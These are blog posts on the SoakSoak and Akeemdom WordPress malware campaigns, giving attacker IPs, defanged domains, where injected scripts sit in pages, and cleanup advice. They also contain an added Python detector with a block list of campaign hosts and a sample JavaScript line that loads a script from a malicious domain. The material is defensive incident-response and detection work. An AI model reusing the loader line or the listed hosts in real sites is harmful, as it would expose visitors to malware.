Community news and analysis: December 2014

Posted on January 16, 2015 - 14:12 by ccondon

Here's a quick (late) roundup of security community happenings from last month. Naturally, the SoakSoak malware campaign has been foremost on our minds, but December brought a number of other announcements and some neat malware analysis from our partners, too.

Security news

  • Google released the code for its End-to-End Chrome extension as open source (GitHub repository). As of last month, the extension, which enables end-to-end encryption for Gmail within Chrome, was not yet ready for the Chrome Web Store.
  • Qualys on December Patch Tuesday

Malware 

  • ESET and Sophos on Win32/VirLock, a parasitic, polymorphic hybrid strain of ransomware
  • Sucuri on the massive SoakSoak malware campaign, the RevSlider vulnerability that led to it, and infection evolution
  • Automattic on scanning for SoakSoak and how to begin fixing a compromised site
  • Fortinet: Analysis of a JAR obfuscated malware packer

Akeemdom malware poses as ad network

Posted on January 13, 2015 - 15:45 by ccondon

A PSA from Blake, our testing intern:

For the past two weeks, we have seen a large number of WordPress sites infected with a malicious script located at http://ads[.]akeemdom[.]com/db26 (Google Safe Browsing diagnostics). This infection is related to the SoakSoak campaign; in this case, the malware disguises itself as an ad network. Although the exploit itself has never delivered content to our testers, we have noticed its signatures. The following code snippet is typically inserted at the end of JavaScript files located in the infected site’s /wp-includes/ directory:

It’s often found in multiple scripts; be sure to check all the JavaScript files your site uses. Sucuri has additional analysis here.

SoakSoak malware: Infection hallmarks and removal resources

Posted on December 24, 2014 - 14:38 by ccondon

On December 14, Sucuri wrote about the massive “SoakSoak” malware campaign targeting WordPress sites through a vulnerability in the RevSlider plugin. The plugin is wrapped into many WordPress themes (as disclosed to Sucuri by DreamHost’s Mika Epstein in September). Google blacklisted thousands of sites that they detected as having been infected with the malware. Safe Browsing diagnostics for soaksoak[.]ru indicate that Google has detected SoakSoak infections on more than 17,000 sites. Sucuri reckons over 100K sites were compromised in the campaign’s initial onslaught.

Sucuri has some snippets of bad code and cleanup advice here and here. Webmasters who have already cleaned up should note that the malware has morphed and has been reinfecting sites—more on this in our notes below.  

Our testing queue ballooned as a result of the attack, since many webmasters whose sites were infected have been requesting StopBadware reviews. We’ve also seen a number of posts on various forums (WordPress.org forum, Google’s malware and hacked site forum, our own community forum) with questions and advice on removing the malware.

The good news is that webmasters appear to be having success cleaning up SoakSoak infections. The following are some notes from our testing team on what we’re seeing with respect to this campaign. 

Obfuscated JavaScript

Initially, we saw a lot of obfuscated code on .js pages. For example, we found the following on pages such as caption.js:

[Image: obfuscated JavaScript from the SoakSoak malware]

Collect.js

Right now, we’re seeing a lot of false “collect.js” scripts inserted into homepages, either right at the beginning of a <script> tag accompanied by other legitimate js files, or more conspicuously right after the </head> tag. 

The script itself never serves content to our testers, but it always loads from one of a few IPs, most commonly 122.155.168.105 or 193.169.87.179. The former has been replacing the latter in recent tests, suggesting that the IP itself changes periodically.

The code is innocuous-looking other than its placement and the naked IP. Some examples: 

[Image: bad script from the SoakSoak malware campaign]

[Image: another bad script from SoakSoak]

Deleting this code gets rid of the infection (though notably not any backdoors or vulnerabilities that allowed the compromise to begin with), and webmasters do seem to be getting rid of it. 
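A defender-side check for the hallmarks described in this post and in the Akeemdom PSA above: a script tag loading from a bare IP or from a host named in these posts, a script tag dropped directly after `</head>`, and URLs to those hosts appended to JavaScript files under /wp-includes/. This is an added example, not StopBadware's or Sucuri's code; the sample HTML and JavaScript are constructed, and 198.51.100.7 is a documentation IP, not one from the campaign.

```python
import re
import ipaddress
from urllib.parse import urlparse

# Hosts named in the posts above (shown there defanged with [.]).
KNOWN_BAD_HOSTS = {"soaksoak.ru", "ads.akeemdom.com",
                   "122.155.168.105", "193.169.87.179"}

URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.I)
SCRIPT_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.I)
AFTER_HEAD_RE = re.compile(r"</head>\s*<script\b", re.I)

def classify_host(url):
    """Return why a URL is suspicious, or None: a host named in the posts,
    or a bare IP where a hostname is expected (the 'naked IP' hallmark)."""
    host = (urlparse(url).hostname or "").lower()
    if host in KNOWN_BAD_HOSTS:
        return "known campaign host"
    try:
        ipaddress.ip_address(host)
        return "script/resource loaded from bare IP"
    except ValueError:
        return None

def scan_html(html):
    """Flag external <script src> tags with suspicious hosts, and note a
    script tag placed directly after </head> (a placement hallmark)."""
    findings = [(src, reason) for src in SCRIPT_RE.findall(html)
                if (reason := classify_host(src))]
    if AFTER_HEAD_RE.search(html):
        findings.append(("<script> immediately after </head>", "suspicious placement"))
    return findings

def scan_js(js):
    """Flag URLs inside a JavaScript file that point at suspicious hosts;
    the injected loader is typically appended at the end of the file."""
    return [(url, reason) for url in URL_RE.findall(js)
            if (reason := classify_host(url))]

# Constructed samples, not captured from a real site.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.com/jquery.js"></script>
</head>
<script src="http://198.51.100.7/collect.js"></script>
<body>...</body></html>"""

SAMPLE_JS = ("function legit(){return 1;}\n"
             "var s=document.createElement('script');"
             "s.src='http://ads.akeemdom.com/db26';document.head.appendChild(s);")

if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML) + scan_js(SAMPLE_JS):
        print(hit)
```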

A note on cleanup

If your site has been affected, note Sucuri's warning:

We are hearing a lot of recommendations online to just replace the swfobject.js and template-loader.php files to remove the infection...It does remove the infection, but does not address the leftover backdoors and initial entry points.

In this case, the infection vector is the RevSlider plugin. In addition to getting rid of the bad code (but please don't delete files at random!), you'll need to update the plugin and any themes you're using that have RevSlider wrapped into them. Ask your hosting provider and/or a professional website malware removal specialist for help if you're unsure about the files you're modifying. You can always ask for help on free forums like the WordPress.org forum, StopBadware's community forum, and Google's malware and hacked sites forum.